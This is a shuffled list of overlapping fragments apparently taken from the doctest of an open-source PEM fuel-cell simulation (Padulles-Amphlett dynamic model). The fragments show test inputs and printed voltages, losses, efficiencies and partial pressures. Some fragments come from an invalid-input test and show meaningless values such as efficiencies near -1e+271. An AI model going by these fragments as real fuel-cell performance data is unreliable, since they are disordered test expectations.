0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2 :", "Voltage : 4.147096936703843 V Loss : 0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O", "V FC Efficiency : 0.5192622556245563 FC Power : 10.12561398467885 W FC Voltage :", "FC Efficiency : 0.5822525519832258 FC Power : 2.724941943281497 W FC Voltage : 4.541569905469162", ": 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V", "Ohmic : 0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC Power : 4.368519891182348 W", ": 0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal :", "0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ########### I :", ": 6.068393967445208 V Eta Activation : 0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V", "Power-Thermal : 3.338951337284836 W ########### I : 1.8 E : 6.068389351849069 V Eta", "Eta Ohmic : 0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC Power : 13.035960331860592", "FC Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271", ">>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>>", ": 0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC", "V Eta Concentration : 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V FC Efficiency", "atm PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ########### I : 2.9", ": -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O :", "Eta Ohmic : 0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC Power : 7.498786919530012", "0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ########### I : 2.8 E : 6.068373962362936", ": 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ########### I : 3.9 E :", "W ########### I : 2.3 E : 6.068381657907269 V Eta Activation : 0.39318591119501267", "0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V FC", "0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC Power : 14.814425815913308 W FC Voltage", "Eta Ohmic : 0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC Power : 7.879484179737301", "atm Power-Thermal : 3.8055158202626993 W ########### I : 2.0 E : 6.0683862744646095 V", "0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC Power : 7.879484179737301 W FC Voltage", ": 0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC Power : 3.555492278365111 W FC", "Voltage : 3.9730043399134525 V Loss : 0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O", "PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ###########", "6.144553272737403 V Eta Activation : 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V Eta", "atm Power-Thermal : 0.588897103358606 W ########### I : 0.5 E : 6.068409348602667 V", ": 6.0684078107750326 V Eta Activation : 0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V", "V Loss : 0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765 atm", "0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997", "5.562302489345107 W FC Voltage : 4.27869422257316 V Loss : 0.3579405643231677 V PH2 :", "8.25823714817561 W FC Voltage : 4.129118574087805 V Loss : 0.387853540075361 V PH2 :", "4.036258829180992 V Loss : 0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789", ": 0.49981193710908595 FC Power : 14.814425815913308 W FC Voltage : 3.8985331094508706 V Loss", "Power : 4.368519891182348 W FC Voltage : 4.368519891182348 V Loss : 0.3399763535283976 V", "3.1426888772911847 W FC Voltage : 4.489555538987407 V Loss : 0.3157701467791963 V PH2 :", "V FC Efficiency : 0.569790429225178 FC Power : 3.555492278365111 W FC Voltage :", "W FC Voltage : 4.05024559387154 V Loss : 0.4036265972020676 V PH2 : 0.19683353317405658", "0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ########### I : 3.7 E : 6.068360106342617", "FC Efficiency : 0.5124481138904448 FC Power : 11.591576336201861 W FC Voltage : 3.997095288345469", ": 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC", "E : 6.14455344314445 V Eta Activation : 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07", "I : 0.1 E : 6.14455344314445 V Eta Activation : 0.9092187394310518 V Eta", "########### I : 1.8 E : 6.068389351849069 V Eta Activation : 0.3769483587657406 V", "3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC Power", "Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . I", "V PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164 atm", "Eta Ohmic : 0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC Power : 11.227208859041653", "W ########### I : 2.0 E : 6.0683862744646095 V Eta Activation : 0.3839273955127959", ": 3.918455976181777 V Loss : 0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O :", "0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC Power", "I : 3.2 E : 6.068367804773196 V Eta Activation : 0.41506683170178466 V Eta", "V FC Efficiency : 0.5822525519832258 FC Power : 2.724941943281497 W FC Voltage :", "Activation : 0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288", ": 0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal :", "Eta Ohmic : 0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC Power : 10.12561398467885", ": 1.4321903165847678 W FC Voltage : 4.7739677219492265 V Loss : 0.25888894042333943 V PH2", ": 0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2 :", ": 0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V", ": 0.39870996749954657 V Eta Concentration : 0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V", "PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ###########", "FC Voltage : 4.4443653479563885 V Loss : 0.324807877394268 V PH2 : 0.19707238966150117 atm", ": 6.068410886366294 V Eta Activation : 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V", "0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ########### I : 3.4 E : 6.06836472559345", "0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC Power", "0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302", "V Eta Ohmic : 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC Power :", "0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ########### I :", "Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O", ": 0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ########### I", "V Eta Concentration : 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V FC Efficiency", ": 0.588897103358606 W ########### I : 0.5 E : 6.068409348602667 V Eta Activation", "4.147096936703843 V Loss : 0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873", ": 6.068372423061707 V Eta Activation : 0.4085437792118771 V Eta Concentration : 0.0005757433248249061 V", "Eta Activation : 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic :", "W ########### I : 1.9 E : 6.068387813188879 V Eta Activation : 0.38052969267197334", "V Loss : 0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931 atm", "3.9 E : 6.068357026521189 V Eta Activation : 0.42817767789163225 V Eta Concentration :", ": 7.003243683145644 W ########### I : 3.3 E : 6.0683662652154 V Eta Activation", "Power : -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V", "V Loss : 0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998 atm", "atm Power-Thermal : 7.259039668139408 W ########### I : 3.4 E : 6.06836472559345 V", "Eta Concentration : 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V FC Efficiency :", "V PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894 atm", "1.6 E : 6.068392428977227 V Eta Activation : 0.36914696409844006 V Eta Concentration :", "0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC Power : 7.498786919530012 W FC Voltage", "Voltage : 4.111968011342347 V Loss : 0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O", "Eta Activation : 0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V Eta Ohmic :", "I : 3.0 E : 6.0683708836963435 V Eta Activation : 0.4107901672807063 V Eta", "V Eta Concentration : 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V FC Efficiency", "0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC Power : 5.562302489345107 W FC Voltage", "Activation : 0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664", "Efficiency : 0.5192622556245563 FC Power : 10.12561398467885 W FC Voltage : 4.05024559387154 V", "atm Power-Thermal : 3.5712130804699886 W ########### I : 1.9 E : 6.068387813188879 V", ": 0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ########### I", ": 0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2 :", ": 0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal :", "Eta Activation : 0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V Eta Ohmic :", ": 0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V", "W ########### I : 3.2 E : 6.068367804773196 V Eta Activation : 0.41506683170178466", "W ########### I : 3.3 E : 6.0683662652154 V Eta Activation : 0.417106024344736", "Power : 7.879484179737301 W FC Voltage : 4.147096936703843 V Loss : 0.38425817529700723 V", "Ohmic : 0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC Power : 2.30145399353242 W", "0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ########### I : 1.1 E : 6.068400120676597", "Eta Activation : 0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V Eta Ohmic :", "Eta Activation : 0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V Eta Ohmic :", "Eta Concentration : 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V FC Efficiency :", ": 7.879484179737301 W FC Voltage : 4.147096936703843 V Loss : 0.38425817529700723 V PH2", "1.5 E : 6.068393967445208 V Eta Activation : 0.3648724409731032 V Eta Concentration :", "W ########### I : 2.4 E : 6.068380118926627 V Eta Activation : 0.3960054536369255", "9.331810347802308e+271 W ########### I : 4.0 E : 6.144553093215826 V Eta Activation :", "opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model", "Power-Thermal : 7.259039668139408 W ########### I : 3.4 E : 6.06836472559345 V Eta", "V Eta Ohmic : 0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC Power :", "FC Power : 4.769576467003663 W FC Voltage : 4.335978606366966 V Loss : 0.3464843028619262", "0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657", "0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ########### I : 0.4 E : 6.068410886366294", ": 0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC Power : 9.010249888496427 W FC", "FC Voltage : 3.918455976181777 V Loss : 0.4299811339950573 V PH2 : 0.1966789789762983 atm", "PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ###########", "PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ########### I : 0.6 E", ": 6.068369344266841 V Eta Activation : 0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V", "I : 2.3 E : 6.068381657907269 V Eta Activation : 0.39318591119501267 V Eta", "W FC Voltage : 4.306183473128157 V Loss : 0.3524430218673324 V PH2 : 0.1970161881350436", "I : 0.5 E : 6.068409348602667 V Eta Activation : 0.2921240370409447 V Eta", "0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC Power", "0.40621862980268425 V Eta Concentration : 0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V FC", "0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC Power : 10.12561398467885 W FC Voltage", "Loss : 0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2", "FC Voltage : 3.9083739857013544 V Loss : 0.4319972241282524 V PH2 : 0.1966649285946839 atm", ": 0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal :", "Activation : 0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824", "Voltage : 4.079852105493149 V Loss : 0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O", ": 0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC Power : 5.954436076965834 W FC", "V Eta Activation : 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V Eta Ohmic", "Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678 W FC Voltage : 4.7739677219492265 V", "Eta Activation : 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V Eta Ohmic :", "Power-Thermal : 5.7435444057448075 W ########### I : 2.8 E : 6.068373962362936 V Eta", "V FC Efficiency : 0.5211232875604884 FC Power : 9.755427943132343 W FC Voltage :", "3.9393990084279658 V Loss : 0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057", "Power-Thermal : 5.992791140958347 W ########### I : 2.9 E : 6.068372423061707 V Eta", "10.494272955870581 W FC Voltage : 4.036258829180992 V Loss : 0.40642364231840483 V PH2 :", "14.106441514254398 W FC Voltage : 3.918455976181777 V Loss : 0.4299811339950573 V PH2 :", "Ohmic : 0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC Power : 11.95459858763542 W", ": 0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2 :", ">>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>>", "0.5901164085980564 FC Power : 2.30145399353242 W FC Voltage : 4.60290798706484 V Loss :", ": 9.383659842634243 W FC Voltage : 4.079852105493149 V Loss : 0.397705910482824 V PH2", ": 0.3 E : 6.068412424065923 V Eta Activation : 0.2583036192079603 V Eta Concentration", "0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ########### I : 2.5 E : 6.068378579881878", ": 7.498786919530012 W FC Voltage : 4.165992733072229 V Loss : 0.380479323755368 V PH2", "V Eta Ohmic : 0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC Power :", ": 0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal : 5.249386015321152 W ########### I", ": 0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal :", "atm Power-Thermal : 8.555574184086693 W ########### I : 3.9 E : 6.068357026521189 V", "V FC Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678 W FC Voltage :", "V Eta Ohmic : 0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC Power :", ": 2.1 E : 6.068384735676256 V Eta Activation : 0.38715939375662295 V Eta Concentration", "########### I : 1.4 E : 6.06839550584913 V Eta Activation : 0.36030304442922906 V", "0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658", "########### I : 0.2 E : 6.068413961701556 V Eta Activation : 0.23146009851376736 V", "Ohmic : 0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC Power : 5.562302489345107 W", "Concentration : 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V FC Efficiency : 0.5093595307581349", ": 0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ########### I", ": 1.5710516301767605 W ########### I : 1.0 E : 6.068401658824337 V Eta Activation", "Concentration : 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V FC Efficiency : 0.5485505413555333", "I : 1.5 E : 6.068393967445208 V Eta Activation : 0.3648724409731032 V Eta", "6.068380118926627 V Eta Activation : 0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V Eta", "0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal : 7.516043371344917", "V PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658 atm", "atm PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W", "4.404387077581378 V Loss : 0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414", "2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>>", "W FC Voltage : 3.9614863490169867 V Loss : 0.4213762911512418 V PH2 : 0.19673518050275585", "0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC Power", "I : 2.6 E : 6.068377040773017 V Eta Activation : 0.40130847825734167 V Eta", "FC Power : 9.755427943132343 W FC Voltage : 4.06476164297181 V Loss : 0.40072369519096346", "0.5157386322058496 FC Power : 10.861455594255196 W FC Voltage : 4.022761331205627 V Loss :", "W FC Voltage : 4.7739677219492265 V Loss : 0.25888894042333943 V PH2 : 0.19714264156957312", "6.068409348602667 V Eta Activation : 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V Eta", "FC Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm", "# -*- coding: utf-8 -*- ''' >>> from opem.Dynamic.Padulles_Amphlett import * >>> import", "3.4 E : 6.06836472559345 V Eta Activation : 0.4190844003836543 V Eta Concentration :", ": 0.00657019196303564 V FC Efficiency : 0.50107358791043 FC Power : 14.460983747095012 W FC", ": 3.757170500110593e+272 W ########### Report is generating ... Warning : The value of", "0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V FC", ": 6.068403196908046 V Eta Activation : 0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V", "Voltage : 4.4443653479563885 V Loss : 0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O", "0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803", "Eta Concentration : 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V FC Efficiency :", "Loss : 0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2", ": 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ########### I : 1.2 E :", "PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal", "W FC Voltage : 4.229335388177429 V Loss : 0.3678117158535559 V PH2 : 0.19697403699020044", "V FC Efficiency : 0.5140663396997094 FC Power : 11.227208859041653 W FC Voltage :", "0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ########### I : 0.9 E : 6.068403196908046", "Loss : 0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789 atm PO2", "0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269", "Ohmic : 0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC Power : 7.498786919530012 W", "PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal", "PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ###########", "3.757170500110593e+272 W ########### Report is generating ... Warning : The value of I(>0.1)", "atm Power-Thermal : 6.49540141236458 W ########### I : 3.1 E : 6.068369344266841 V", "Activation : 0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212", "Ohmic : 0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678 W", ": 5.249386015321152 W ########### I : 2.6 E : 6.068377040773017 V Eta Activation", "Power-Thermal : 2.8809969177338575 W ########### I : 1.6 E : 6.068392428977227 V Eta", "atm PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W", "PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ########### I : 2.0 E", "0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC Power : 8.635132823818928 W FC Voltage", "atm PO2 : 0.19043598052153862 atm Power-Thermal : 5.249386015321152 W ########### I : 2.6", "Power : 11.95459858763542 W FC Voltage : 3.9848661958784737 V Loss : 0.41670093756357396 V", "0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064", "8.033558485745605 W ########### I : 3.7 E : 6.068360106342617 V Eta Activation :", "V Eta Activation : 0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V Eta Ohmic", "Concentration : 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270", "Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5]", "atm PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ########### I : 0.3", "V PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368 atm", "########### I : 2.5 E : 6.068378579881878 V Eta Activation : 0.39870996749954657 V", ": 4.368519891182348 V Loss : 0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O :", "Power-Thermal : 2.432697510654893 W ########### I : 1.4 E : 6.06839550584913 V Eta", "0.6589203974773784 FC Power : 0.5139579100323552 W FC Voltage : 5.1395791003235525 V Loss :", ": 3.0 E : 6.0683708836963435 V Eta Activation : 0.4107901672807063 V Eta Concentration", "FC Power : 12.316313453731704 W FC Voltage : 3.9730043399134525 V Loss : 0.4190730008706778", "Voltage : -4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O", "0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066", "FC Power : 6.344003082266143 W FC Voltage : 4.229335388177429 V Loss : 0.3678117158535559", "0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885 W FC Voltage", "Activation : 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837", "6.068393967445208 V Eta Activation : 0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V Eta", "0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644", ": 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ########### I : 3.7 E :", ": 0.5422224856637728 FC Power : 6.344003082266143 W FC Voltage : 4.229335388177429 V Loss", "Padulles-Amphlett-Model Simulation ########### Analyzing . . . I : 0.1 E : 6.0684154992732005", "atm Power-Thermal : 2.8809969177338575 W ########### I : 1.6 E : 6.068392428977227 V", ": 6.14455344314445 V Eta Activation : 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V", ": 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC", ": 1.781480108817652 W ########### I : 1.1 E : 6.068400120676597 V Eta Activation", "Activation : 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376", "Activation : 0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377", "I : 3.5 E : 6.068363185907339 V Eta Activation : 0.42100548618901656 V Eta", ": 0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal :", "PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ###########", "Loss : 0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2", ": 0.507882865258588 FC Power : 12.676756316854359 W FC Voltage : 3.9614863490169867 V Loss", ": 6.068398582464819 V Eta Activation : 0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V", "V Loss : 0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834 atm", "Eta Ohmic : 0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC Power : 4.769576467003663", "0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V FC", "0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V FC", "0.1 E : 6.14455344314445 V Eta Activation : 0.9092187394310518 V Eta Concentration :", "0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458", "FC Power : 13.035960331860592 W FC Voltage : 3.950291009654725 V Loss : 0.42361505111213504", "V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm", "atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W", "W ########### I : 3.5 E : 6.068363185907339 V Eta Activation : 0.42100548618901656", "atm PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W", "########### I : 2.7 E : 6.068375501600038 V Eta Activation : 0.4038089891176398 V", "atm Power-Thermal : 8.033558485745605 W ########### I : 3.7 E : 6.068360106342617 V", "PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ########### I : 3.4 E", "Voltage : 4.129118574087805 V Loss : 0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O", "V FC Efficiency : 0.50107358791043 FC Power : 14.460983747095012 W FC Voltage :", "[Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ###########", "V Eta Ohmic : 0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC Power :", ": 0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V", ": 6.068390890445182 V Eta Activation : 0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V", ": 0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2 :", ": 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC", "Concentration : 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271", "atm Power-Thermal : 